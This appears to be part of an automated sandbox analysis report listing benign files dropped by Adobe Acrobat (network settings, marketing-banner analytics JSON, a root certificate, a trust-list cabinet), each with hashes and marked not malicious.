                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):66934
                                                                  Entropy (8bit):2.436424201832609
                                                                  Encrypted:false
                                                                  SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                  MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                  SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                  SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                  SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                  Malicious:false
                                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                  Category:dropped
                                                                  Size (bytes):71954
                                                                  Entropy (8bit):7.996617769952133
                                                                  Encrypted:true
                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                  Malicious:false
                                                                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):192
                                                                  Entropy (8bit):2.7485180290352824
                                                                  Encrypted:false
                                                                  SSDEEP:3:kkFklvEvkfllXlE/HT8khNNX8RolJuRdxLlGB9lQRYwpDdt:kKXlT8kNMa8RdWBwRd
                                                                  MD5:CFE5299ACA35E5152A8BB14AEFAAF715
                                                                  SHA1:B7BED4A79D9AB3D50059A717F698147902F59808
                                                                  SHA-256:E2C710C6CA4B33B81A112855F62490FD5CCCE545078835DEED182E01E606027B
                                                                  SHA-512:059183084CFE6141F68FFD81EED9A593E3517BCAEDE6DEB4587ACF9710FCECBA8EF3532AA7C6426A06C02AAF2B31BF94E60DE72BE8AB93433434FED1CC67ED46
                                                                  Malicious:false
                                                                  Preview:p...... ...........J6U..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):328
                                                                  Entropy (8bit):3.2539954282295116
                                                                  Encrypted:false
                                                                  SSDEEP:6:kKkQ3D9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8QqDImsLNkPlE99SNxAhUe/3
                                                                  MD5:2F315A09A0C59F76C4A72F3601C1E864
                                                                  SHA1:3252B032A8DC3B3CB3A91FF0A6B66793F635112B
                                                                  SHA-256:12ED4791579F285FE3CDA8CB89E979C0D747A24FD8274CB8FB15E551FB5C1C2E
                                                                  SHA-512:E48B5B6DF78B9D463C97422C7E366B35F5AD17436B2EB438347848DF75938F26E76E134130DA1156860691B61BEF8618365F755CE6A5172F9FA6B2C3D3EE0C61
                                                                  Malicious:false
                                                                  Preview:p...... ...........]6U..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.323222159693221
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJM3g98kUwPeUkwRe9:YvXKX5VqYpW7EGMbLUkee9
                                                                  MD5:CDB931FED41A332809602F8EE0151012
                                                                  SHA1:AE618022633169395DCD389AC10502DFA79E219C
                                                                  SHA-256:4D38E6AE042719D7768F56B0C27B2DFB2B231D3B76969A84D9C874157450ABD1
                                                                  SHA-512:3DB2E048EE635E3CE36FA9698E971061D903DA4E0E9DD20C1E9AEC28D3D84425C00DC8358F0A0D2EF92C7D552EF735F83B89CFAF41C7843405E4A5E0CDC63127
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.260245438681416
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfBoTfXpnrPeUkwRe9:YvXKX5VqYpW7EGWTfXcUkee9
                                                                  MD5:C2A29AC4529955E96738F288C5F3AF05
                                                                  SHA1:E3DF528376F9E690C05113D888C2098B255DA1E4
                                                                  SHA-256:422C550C360F98ECBD546A590C7DCE188348179C64FFD35D5AB7D39AAF6A17A7
                                                                  SHA-512:8DD50FA516D461546B2F50DB75D49E1FFFB703A877A46ED5FB0DBFDA389FD1BA693E5C9BC7BD6624D7C8F4C64D760AFDC27EE54C3477DD643656BAAE9C554FDF
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):294
                                                                  Entropy (8bit):5.237655701392191
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfBD2G6UpnrPeUkwRe9:YvXKX5VqYpW7EGR22cUkee9
                                                                  MD5:CF7ABFFADB6910AFF9EF906C565084F0
                                                                  SHA1:D1B7E1CD0897C997D44D8AC77C150B5218041D9B
                                                                  SHA-256:5EE4CF1314FDF80FB7FA50DFDCFFB7D823E08FCB7C623989A067F250707D041E
                                                                  SHA-512:69C201D4C0C6244B4AE37CF73E85F983CC5C5A9E7ACCAE645FFFAC67230650BB70A82EC82C9112352ACC28DF7D72724D98E8F1F04B088A717AB6F434BAC9300C
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):285
                                                                  Entropy (8bit):5.300706573255087
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfPmwrPeUkwRe9:YvXKX5VqYpW7EGH56Ukee9
                                                                  MD5:97F825CE40543D038EDCF00BD3937FC1
                                                                  SHA1:0A065A72F5128DCEA47AC5DC79BCCE697B8ACB60
                                                                  SHA-256:C209E24F3F839853419BC86CBEFD29FDEA018BC10BB63486FE7829901904F987
                                                                  SHA-512:D008FE5D89368071F96B87C9762C4A4B9B00A9026BF0CFA60745C6F9DB8A97FF12CD977BA64DAFEA1AB5638C3E7C7040F4B94C3D94BB87478690A7A3C392FC01
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1123
                                                                  Entropy (8bit):5.68448020659162
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6XLfiBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSD:YvQqBhgy6SAFv5Ah8cv/D
                                                                  MD5:CF90CF6B49CEED22D5C3FE415A02D574
                                                                  SHA1:C5AAFD01B9B1A96C90A1B287CC9633B36961D899
                                                                  SHA-256:267FC05B6A0A39BBF530B9CE4DD60675FE5844A33A864D47B62480B9E03B97AA
                                                                  SHA-512:92C1468B24AEF21C84D370A9AF38B0FAC9D2D6A4143A30FF247555084E53D9A9B1259AABF4CC06504E61744FB36BD74A054D4B40321578B3BB3FEE878E06D549
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.245348485199396
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf8dPeUkwRe9:YvXKX5VqYpW7EGU8Ukee9
                                                                  MD5:6719C287BDF65BFF58F2445DE52D4930
                                                                  SHA1:C7001355B70CF01E2FFDAD1052DA49F05AEDD042
                                                                  SHA-256:FE588DF8042952C52C8E233958F72D403E4C13C32FBA653292B04AEAE1860D5A
                                                                  SHA-512:CF1C08515BEDF6F966A1CC9ECB815D67C2829593F770E110E6585678DBDE330C0E9137118F1F2D8864A19C01EF10CD1FEA199AB9674D6F2A2FC576510C18E576
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.246244748550422
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfQ1rPeUkwRe9:YvXKX5VqYpW7EGY16Ukee9
                                                                  MD5:562CA1BE82DD1A96B7617CFB5EAFDAD0
                                                                  SHA1:2413126F9CE15D95E7C646D2814E8D3522743554
                                                                  SHA-256:9941AFEC258ABFABF39B0DEB4A82A9611D96805DF413AF0AE534042947553037
                                                                  SHA-512:F1EFD1F0AF368F01C9BE6DCCDDD22983CF84EBAE794DA1B591E5CB8750BD167C58C6D47BDD1BFD5DEA3B196F0AB7D404C55E3AE84211B2B4EF22CF52DED9A046
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.2671208582863525
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfFldPeUkwRe9:YvXKX5VqYpW7EGz8Ukee9
                                                                  MD5:747C3C8FB8FCC8DBBB41CD6B45C60E8B
                                                                  SHA1:D0EFFFD40CAE0AA463DC1899CD746E3C1E846D06
                                                                  SHA-256:443796C6279B2F4F429FFF107CDDA6ECE0ECFE9E3C46DA50D5F86C0026C0C8EF
                                                                  SHA-512:70DDEE35C5882D125DCE0BA8B0A3E223E657360F0B59A576919C247904B176ADE93DA7E90A2474CE49A7F98EFF164F6E5B9D9438E726A35860884D979F9512F1
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):295
                                                                  Entropy (8bit):5.275449955068809
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfzdPeUkwRe9:YvXKX5VqYpW7EGb8Ukee9
                                                                  MD5:80BC593B63B721505F2BF0BD63E29562
                                                                  SHA1:9B6964E75BF04AF9C1E5ACD465A7249EFD733EB8
                                                                  SHA-256:7BBD3A0C4C90237760840AD7F05BBC00498A2BFAF306F5A52564FAC62BBBDE68
                                                                  SHA-512:C0337FA4A761F49FD100BA52C94E1A0E785B9DFAF7906A67957AF6A30822E83D1DE03AA5226D23EE4865D421E8309F560F0677F701FA9A90857E116B8481BA7C
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):289
                                                                  Entropy (8bit):5.254575972396364
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfYdPeUkwRe9:YvXKX5VqYpW7EGg8Ukee9
                                                                  MD5:03F228E2201ED366C5DFA9710DF2F396
                                                                  SHA1:8BDF9E6E3A81FD813FC2A6D5E5E0F31AF640CE0A
                                                                  SHA-256:0A01C3B390D3174A6F60C70D9675BBFAC794A832B4B4C2CADB790A4F18D1E872
                                                                  SHA-512:DBE7F50E9423057CC3659008FCE9856D3C0E9603E2EBACA397DDCD919A1839BD194A84A615E72EDFDA4ED080B705B568426789F1FB4F68E947D32AFF789D5C8A
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):284
                                                                  Entropy (8bit):5.2401256173510395
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf+dPeUkwRe9:YvXKX5VqYpW7EG28Ukee9
                                                                  MD5:CB060455E544FBF44537CE688631590A
                                                                  SHA1:FD90F7273706F0DF5D1DC79801B02D811A55DE92
                                                                  SHA-256:DA24E78C4F62D543DF731F745359CA9135BD448F415DBF4D9EA1800A2F49426F
                                                                  SHA-512:2545851483755EEB8CB2B3E9D2815B3B8CA07A0E2C4D096F5194545241361DD591DE0E5971B2AB6BBF0B840DE1C1087DC7D2D79E5F3AD60809AAF7B262F2533F
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.238435262699805
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfbPtdPeUkwRe9:YvXKX5VqYpW7EGDV8Ukee9
                                                                  MD5:7A67990159975FE74237AB999464684E
                                                                  SHA1:27B1D7467F0B81F94E2CA210EA517D40DD31CB93
                                                                  SHA-256:D506903B187C34BCF9E3DF936514CBFC9074270D6A1A7A0B8E7B465C3BE0D27E
                                                                  SHA-512:09D1856BDD440E7F3FA6B727BBF4842CED8A018A724532372390621C21A3B482D6537293480D57EB73C879D12E0A0473408898B37858647740B926F93C60F166
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):287
                                                                  Entropy (8bit):5.238829995516854
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJf21rPeUkwRe9:YvXKX5VqYpW7EG+16Ukee9
                                                                  MD5:32C68EB6EC0591BC69D20457B2562FCE
                                                                  SHA1:9DAD255D47741ED1ECEF2BE1602F7933C3AE76CE
                                                                  SHA-256:0F0BD1BD015FB15778872B365D7A0A4EC21C08476F272ACA23AD12B5F8963BDD
                                                                  SHA-512:48254709ECD13F2CC9DC6977FC2348AB919AAF4C804C267586ABA4D8D665B93BDB99EB9BD827F199D61B22821AD5954B4C7A75F79543F8B02720752484DFF78E
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):1090
                                                                  Entropy (8bit):5.655642017487848
                                                                  Encrypted:false
                                                                  SSDEEP:24:Yv6XLfiBamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSD:YvQqNBgkDMUJUAh8cvMD
                                                                  MD5:DBA924F0464B387C58F085B544A54833
                                                                  SHA1:EA354E125C682959429E9C26D986F52EAB36E4B5
                                                                  SHA-256:A2378769EDCDC46FB56E1E086C6DBBD8EAE8C66C02D0763AF9237339D5FB7B28
                                                                  SHA-512:C8C661AB959DC246625374E3382C094A08FCDAC08E77D88FE08ADD1EA7E755D6AB6AF7F5C55C9B6886271A78CF7D217397F7CAB379798B107EAE80EC1BE722D8
                                                                  Malicious:false
                                                                  Preview:{"analyticsData":{"responseGUID":"8b2def1c-5c0b-42ce-8c92-814d60fc8425","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735131006503,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):286
                                                                  Entropy (8bit):5.213935032636147
                                                                  Encrypted:false
                                                                  SSDEEP:6:YEQXJ2HXPhVWeKxQb+FIbRI6XVW7+0YmoAvJfshHHrPeUkwRe9:YvXKX5VqYpW7EGUUUkee9
                                                                  MD5:E2EBD6019E517FD0889C1ACA3EE0417C
